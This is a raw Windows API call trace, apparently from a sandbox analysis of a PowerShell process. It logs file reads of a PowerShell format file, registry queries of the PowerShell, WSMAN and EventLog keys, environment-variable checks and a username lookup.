	[0502.345] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x528b694a, Data2=0x9b5b, Data3=0x4ee8, Data4=([0]=0xa4, [1]=0xea, [2]=0x8, [3]=0xc3, [4]=0x67, [5]=0xd7, [6]=0x1f, [7]=0x32))) returned 0x0
	[0502.345] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0502.345] GetFileType (hFile=0x320) returned 0x1
	[0502.345] SetErrorMode (uMode=0x1) returned 0x1
	[0502.345] GetFileType (hFile=0x320) returned 0x1
	[0502.345] ReadFile (in: hFile=0x320, lpBuffer=0x32b9108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b9108*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.346] ReadFile (in: hFile=0x320, lpBuffer=0x32b9108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b9108*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.346] ReadFile (in: hFile=0x320, lpBuffer=0x32b9108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b9108*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.346] ReadFile (in: hFile=0x320, lpBuffer=0x32b9108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b9108*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0502.347] ReadFile (in: hFile=0x320, lpBuffer=0x32b9108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b9108*, lpNumberOfBytesRead=0x1ad2d8*=0xe98, lpOverlapped=0x0) returned 1
	[0502.347] ReadFile (in: hFile=0x320, lpBuffer=0x32b8708, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b8708*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0502.347] ReadFile (in: hFile=0x320, lpBuffer=0x32b9108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x32b9108*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0502.347] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x320) returned 0x0
	[0502.347] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0502.347] CoTaskMemAlloc (cb=0x5a) returned 0x4541e0
	[0502.347] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x4541e0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0502.347] CoTaskMemFree (pv=0x4541e0) 
	[0502.347] RegCloseKey (hKey=0x320) returned 0x0
	[0502.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0502.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0502.348] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x68f0bd19, Data2=0xfb3d, Data3=0x4971, Data4=([0]=0xb7, [1]=0x3e, [2]=0xc0, [3]=0x93, [4]=0x3f, [5]=0x20, [6]=0x81, [7]=0xb3))) returned 0x0
	[0502.348] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x728218f7, Data2=0xf3d1, Data3=0x4bdc, Data4=([0]=0xaf, [1]=0xcf, [2]=0xd, [3]=0x7b, [4]=0x19, [5]=0xe1, [6]=0x7f, [7]=0x77))) returned 0x0
	[0503.071] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.071] CoTaskMemFree (pv=0x4344f0) 
	[0503.072] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.072] CoTaskMemFree (pv=0x4344f0) 
	[0503.073] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.074] CoTaskMemFree (pv=0x4344f0) 
	[0503.075] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.075] CoTaskMemFree (pv=0x4344f0) 
	[0503.086] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.086] CoTaskMemFree (pv=0x4344f0) 
	[0503.087] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.087] CoTaskMemFree (pv=0x4344f0) 
	[0503.087] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0503.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.087] CoTaskMemFree (pv=0x4344f0) 
	[0503.725] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad578 | out: phkResult=0x1ad578*=0x320) returned 0x0
	[0503.728] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad47c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad478*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0503.728] CoTaskMemFree (pv=0x0) 
	[0503.729] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0503.729] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x3f1af0, lpcchValueName=0x1ad528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0503.729] CoTaskMemFree (pv=0x3f1af0) 
	[0503.729] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0503.729] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x3f1af0, lpcchValueName=0x1ad528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0503.730] CoTaskMemFree (pv=0x3f1af0) 
	[0503.730] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0503.730] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x3f1af0, lpcchValueName=0x1ad528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0503.730] CoTaskMemFree (pv=0x3f1af0) 
	[0503.730] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad50c, lpData=0x0, lpcbData=0x1ad508*=0x0 | out: lpType=0x1ad50c*=0x1, lpData=0x0, lpcbData=0x1ad508*=0x8) returned 0x0
	[0503.730] CoTaskMemAlloc (cb=0xc) returned 0x456ce0
	[0503.730] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad4dc, lpData=0x456ce0, lpcbData=0x1ad4d8*=0x8 | out: lpType=0x1ad4dc*=0x1, lpData="2.0", lpcbData=0x1ad4d8*=0x8) returned 0x0
	[0503.731] CoTaskMemFree (pv=0x456ce0) 
	[0504.914] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4c8 | out: phkResult=0x1ad4c8*=0x2d8) returned 0x0
	[0504.914] RegQueryInfoKeyW (in: hKey=0x2d8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad3cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad3c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.914] CoTaskMemFree (pv=0x0) 
	[0504.914] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.914] RegEnumValueW (in: hKey=0x2d8, dwIndex=0x0, lpValueName=0x3f1af0, lpcchValueName=0x1ad478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0504.914] CoTaskMemFree (pv=0x3f1af0) 
	[0504.914] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.914] RegEnumValueW (in: hKey=0x2d8, dwIndex=0x1, lpValueName=0x3f1af0, lpcchValueName=0x1ad478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0504.914] CoTaskMemFree (pv=0x3f1af0) 
	[0504.914] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.914] RegEnumValueW (in: hKey=0x2d8, dwIndex=0x2, lpValueName=0x3f1af0, lpcchValueName=0x1ad478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0504.914] CoTaskMemFree (pv=0x3f1af0) 
	[0504.914] RegQueryValueExW (in: hKey=0x2d8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad45c, lpData=0x0, lpcbData=0x1ad458*=0x0 | out: lpType=0x1ad45c*=0x1, lpData=0x0, lpcbData=0x1ad458*=0x8) returned 0x0
	[0504.914] CoTaskMemAlloc (cb=0xc) returned 0x43b240
	[0504.914] RegQueryValueExW (in: hKey=0x2d8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad42c, lpData=0x43b240, lpcbData=0x1ad428*=0x8 | out: lpType=0x1ad42c*=0x1, lpData="2.0", lpcbData=0x1ad428*=0x8) returned 0x0
	[0504.915] CoTaskMemFree (pv=0x43b240) 
	[0504.916] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0504.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.916] CoTaskMemFree (pv=0x4344f0) 
	[0504.921] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0504.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.921] CoTaskMemFree (pv=0x4344f0) 
	[0504.926] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4f8 | out: phkResult=0x1ad4f8*=0x2fc) returned 0x0
	[0504.931] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad46c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad468, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad46c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad468*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.931] CoTaskMemFree (pv=0x0) 
	[0504.932] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.932] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x0, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.932] CoTaskMemFree (pv=0x3f1af0) 
	[0504.932] CoTaskMemFree (pv=0x0) 
	[0504.932] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.932] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x1, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.932] CoTaskMemFree (pv=0x3f1af0) 
	[0504.932] CoTaskMemFree (pv=0x0) 
	[0504.932] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.932] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x2, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.932] CoTaskMemFree (pv=0x3f1af0) 
	[0504.932] CoTaskMemFree (pv=0x0) 
	[0504.932] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.932] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x3, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.932] CoTaskMemFree (pv=0x3f1af0) 
	[0504.932] CoTaskMemFree (pv=0x0) 
	[0504.932] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.933] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x4, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.933] CoTaskMemFree (pv=0x3f1af0) 
	[0504.933] CoTaskMemFree (pv=0x0) 
	[0504.933] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.933] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x5, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.933] CoTaskMemFree (pv=0x3f1af0) 
	[0504.933] CoTaskMemFree (pv=0x0) 
	[0504.933] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.933] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x6, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.933] CoTaskMemFree (pv=0x3f1af0) 
	[0504.933] CoTaskMemFree (pv=0x0) 
	[0504.933] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.933] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x7, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.933] CoTaskMemFree (pv=0x3f1af0) 
	[0504.933] CoTaskMemFree (pv=0x0) 
	[0504.933] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0504.933] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x8, lpName=0x3f1af0, lpcchName=0x1ad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0504.933] CoTaskMemFree (pv=0x3f1af0) 
	[0504.933] CoTaskMemFree (pv=0x0) 
	[0504.933] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x300) returned 0x0
	[0504.933] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.934] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x19c) returned 0x0
	[0504.934] RegOpenKeyExW (in: hKey=0x19c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.934] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x324) returned 0x0
	[0504.934] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.934] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x328) returned 0x0
	[0504.934] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.934] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x32c) returned 0x0
	[0504.934] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.934] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x330) returned 0x0
	[0504.934] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.935] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x334) returned 0x0
	[0504.935] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.935] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x338) returned 0x0
	[0504.935] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x0) returned 0x2
	[0504.935] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x33c) returned 0x0
	[0504.935] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad558 | out: phkResult=0x1ad558*=0x340) returned 0x0
	[0504.935] RegCloseKey (hKey=0x340) returned 0x0
	[0504.935] RegCloseKey (hKey=0x2fc) returned 0x0
	[0504.936] RegCloseKey (hKey=0x33c) returned 0x0
	[0505.352] CoTaskMemAlloc (cb=0x804) returned 0x1b83f790
	[0505.353] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83f790, nSize=0x1ad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad768) returned 0x1
	[0509.070] CoTaskMemFree (pv=0x1b83f790) 
	[0509.072] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.072] GetUserNameW (in: lpBuffer=0x3f1af0, pcbBuffer=0x1ad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad7a8) returned 1
	[0509.076] CoTaskMemFree (pv=0x3f1af0) 
	[0509.839] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4a8 | out: phkResult=0x1ad4a8*=0x344) returned 0x0
	[0509.839] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad418, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad41c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad418*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.839] CoTaskMemFree (pv=0x0) 
	[0509.839] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.839] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.839] CoTaskMemFree (pv=0x3f1af0) 
	[0509.839] CoTaskMemFree (pv=0x0) 
	[0509.839] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.839] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.839] CoTaskMemFree (pv=0x3f1af0) 
	[0509.839] CoTaskMemFree (pv=0x0) 
	[0509.839] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.839] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.840] CoTaskMemFree (pv=0x3f1af0) 
	[0509.840] CoTaskMemFree (pv=0x0) 
	[0509.840] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.840] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.840] CoTaskMemFree (pv=0x3f1af0) 
	[0509.840] CoTaskMemFree (pv=0x0) 
	[0509.840] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.840] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.840] CoTaskMemFree (pv=0x3f1af0) 
	[0509.840] CoTaskMemFree (pv=0x0) 
	[0509.840] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.840] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.840] CoTaskMemFree (pv=0x3f1af0) 
	[0509.840] CoTaskMemFree (pv=0x0) 
	[0509.840] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
	[0509.840] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x3f1af0, lpcchName=0x1ad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0509.840] CoTaskMemFree (pv=0x3f1af0) 
	[0509.840] CoTaskMemFree (pv=0x0) 
	[0509.840] CoTaskMemAlloc (cb=0x204) returned 0x3f1af0
